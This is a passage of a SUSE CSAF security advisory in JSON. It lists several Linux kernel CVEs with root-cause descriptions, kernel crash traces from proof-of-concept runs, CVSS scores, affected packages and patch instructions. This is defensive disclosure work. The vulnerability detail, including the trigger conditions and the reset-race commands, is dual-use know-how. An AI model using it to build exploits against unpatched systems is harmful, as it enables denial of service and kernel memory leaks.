"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix device leaks on compat bind and unbind\n\nMake sure to drop the reference taken when looking up the idxd device as\npart of the compat bind and unbind sysfs interface.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71163",
"url": "https://www.suse.com/security/cve/CVE-2025-71163"
},
{
"category": "external",
"summary": "SUSE Bug 1257215 for CVE-2025-71163",
"url": "https://bugzilla.suse.com/1257215"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2026-22976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22976"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset\n\n`qfq_class-\u003eleaf_qdisc-\u003eq.qlen \u003e 0` does not imply that the class\nitself is active.\n\nTwo qfq_class objects may point to the same leaf_qdisc. This happens\nwhen:\n\n1. one QFQ qdisc is attached to the dev as the root qdisc, and\n\n2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get()\n/ qdisc_put()) and is pending to be destroyed, as in function\ntc_new_tfilter.\n\nWhen packets are enqueued through the root QFQ qdisc, the shared\nleaf_qdisc-\u003eq.qlen increases. At the same time, the second QFQ\nqdisc triggers qdisc_put and qdisc_destroy: the qdisc enters\nqfq_reset() with its own q-\u003eq.qlen == 0, but its class\u0027s leaf\nqdisc-\u003eq.qlen \u003e 0. Therefore, the qfq_reset would wrongly deactivate\nan inactive aggregate and trigger a null-deref in qfq_deactivate_agg:\n\n[ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 0.903571] #PF: supervisor write access in kernel mode\n[ 0.903860] #PF: error_code(0x0002) - not-present page\n[ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0\n[ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI\n[ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE\n[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014\n[ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2))\n[ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0\n\nCode starting with the faulting instruction\n===========================================\n 0:\t0f 84 4d 01 00 00 \tje 0x153\n 6:\t48 89 70 18 \tmov %rsi,0x18(%rax)\n a:\t8b 4b 10 \tmov 0x10(%rbx),%ecx\n d:\t48 c7 c2 ff ff ff ff \tmov $0xffffffffffffffff,%rdx\n 14:\t48 8b 78 08 \tmov 0x8(%rax),%rdi\n 18:\t48 d3 e2 \tshl %cl,%rdx\n 1b:\t48 21 f2 \tand %rsi,%rdx\n 1e:\t48 2b 13 \tsub (%rbx),%rdx\n 21:\t48 8b 30 \tmov (%rax),%rsi\n 24:\t48 d3 ea \tshr %cl,%rdx\n 27:\t8b 4b 18 \tmov 0x18(%rbx),%ecx\n\t...\n[ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246\n[ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000\n[ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000\n[ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000\n[ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880\n[ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000\n[ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0\n[ 0.910247] PKRU: 55555554\n[ 0.910391] Call Trace:\n[ 0.910527] \u003cTASK\u003e\n[ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485)\n[ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036)\n[ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076)\n[ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447)\n[ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958)\n[ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861)\n[ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550)\n[ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)\n[ 0.912296] ? __alloc_skb (net/core/skbuff.c:706)\n[ 0.912484] netlink_sendmsg (net/netlink/af\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22976",
"url": "https://www.suse.com/security/cve/CVE-2026-22976"
},
{
"category": "external",
"summary": "SUSE Bug 1257035 for CVE-2026-22976",
"url": "https://bugzilla.suse.com/1257035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22976"
},
{
"cve": "CVE-2026-22977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sock: fix hardened usercopy panic in sock_recv_errqueue\n\nskbuff_fclone_cache was created without defining a usercopy region,\n[1] unlike skbuff_head_cache which properly whitelists the cb[] field.\n[2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is\nenabled and the kernel attempts to copy sk_buff.cb data to userspace\nvia sock_recv_errqueue() -\u003e put_cmsg().\n\nThe crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone()\n (from skbuff_fclone_cache) [1]\n2. The skb is cloned via skb_clone() using the pre-allocated fclone\n[3] 3. The cloned skb is queued to sk_error_queue for timestamp\nreporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE)\n5. sock_recv_errqueue() calls put_cmsg() to copy serr-\u003eee from skb-\u003ecb\n[4] 6. __check_heap_object() fails because skbuff_fclone_cache has no\n usercopy whitelist [5]\n\nWhen cloned skbs allocated from skbuff_fclone_cache are used in the\nsocket error queue, accessing the sock_exterr_skb structure in skb-\u003ecb\nvia put_cmsg() triggers a usercopy hardening violation:\n\n[ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object \u0027skbuff_fclone_cache\u0027 (offset 296, size 16)!\n[ 5.382796] kernel BUG at mm/usercopy.c:102!\n[ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n[ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7\n[ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\n[ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80\n[ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff \u003c0f\u003e 0b 490\n[ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246\n[ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74\n[ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0\n[ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74\n[ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001\n[ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00\n[ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000\n[ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0\n[ 5.384903] PKRU: 55555554\n[ 5.384903] Call Trace:\n[ 5.384903] \u003cTASK\u003e\n[ 5.384903] __check_heap_object+0x9a/0xd0\n[ 5.384903] __check_object_size+0x46c/0x690\n[ 5.384903] put_cmsg+0x129/0x5e0\n[ 5.384903] sock_recv_errqueue+0x22f/0x380\n[ 5.384903] tls_sw_recvmsg+0x7ed/0x1960\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? schedule+0x6d/0x270\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? mutex_unlock+0x81/0xd0\n[ 5.384903] ? __pfx_mutex_unlock+0x10/0x10\n[ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10\n[ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0\n[ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n\nThe crash offset 296 corresponds to skb2-\u003ecb within skbuff_fclones:\n - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 -\n offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 =\n 272 + 24 (inside sock_exterr_skb.ee)\n\nThis patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure.\n\n[1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885\n[2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104\n[3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566\n[4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491\n[5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22977",
"url": "https://www.suse.com/security/cve/CVE-2026-22977"
},
{
"category": "external",
"summary": "SUSE Bug 1257053 for CVE-2026-22977",
"url": "https://bugzilla.suse.com/1257053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22977"
},
{
"cve": "CVE-2026-22978",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22978"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22978",
"url": "https://www.suse.com/security/cve/CVE-2026-22978"
},
{
"category": "external",
"summary": "SUSE Bug 1257227 for CVE-2026-22978",
"url": "https://bugzilla.suse.com/1257227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22981",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22981"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: detach and close netdevs while handling a reset\n\nProtect the reset path from callbacks by setting the netdevs to detached\nstate and close any netdevs in UP state until the reset handling has\ncompleted. During a reset, the driver will de-allocate resources for the\nvport, and there is no guarantee that those will recover, which is why the\nexisting vport_ctrl_lock does not provide sufficient protection.\n\nidpf_detach_and_close() is called right before reset handling. If the\nreset handling succeeds, the netdevs state is recovered via call to\nidpf_attach_and_open(). If the reset handling fails the netdevs remain\ndown. The detach/down calls are protected with RTNL lock to avoid racing\nwith callbacks. On the recovery side the attach can be done without\nholding the RTNL lock as there are no callbacks expected at that point,\ndue to detach/close always being done first in that flow.\n\nThe previous logic restoring the netdevs state based on the\nIDPF_VPORT_UP_REQUESTED flag in the init task is not needed anymore, hence\nthe removal of idpf_set_vport_state(). The IDPF_VPORT_UP_REQUESTED is\nstill being used to restore the state of the netdevs following the reset,\nbut has no use outside of the reset handling flow.\n\nidpf_init_hard_reset() is converted to void, since it was used as such and\nthere is no error handling being done based on its return value.\n\nBefore this change, invoking hard and soft resets simultaneously will\ncause the driver to lose the vport state:\nip -br a\n\u003cinf\u003e\tUP\necho 1 \u003e /sys/class/net/ens801f0/device/reset\u0026 \\\nethtool -L ens801f0 combined 8\nip -br a\n\u003cinf\u003e\tDOWN\nip link set \u003cinf\u003e up\nip -br a\n\u003cinf\u003e\tDOWN\n\nAlso in case of a failure in the reset path, the netdev is left\nexposed to external callbacks, while vport resources are not\ninitialized, leading to a crash on subsequent 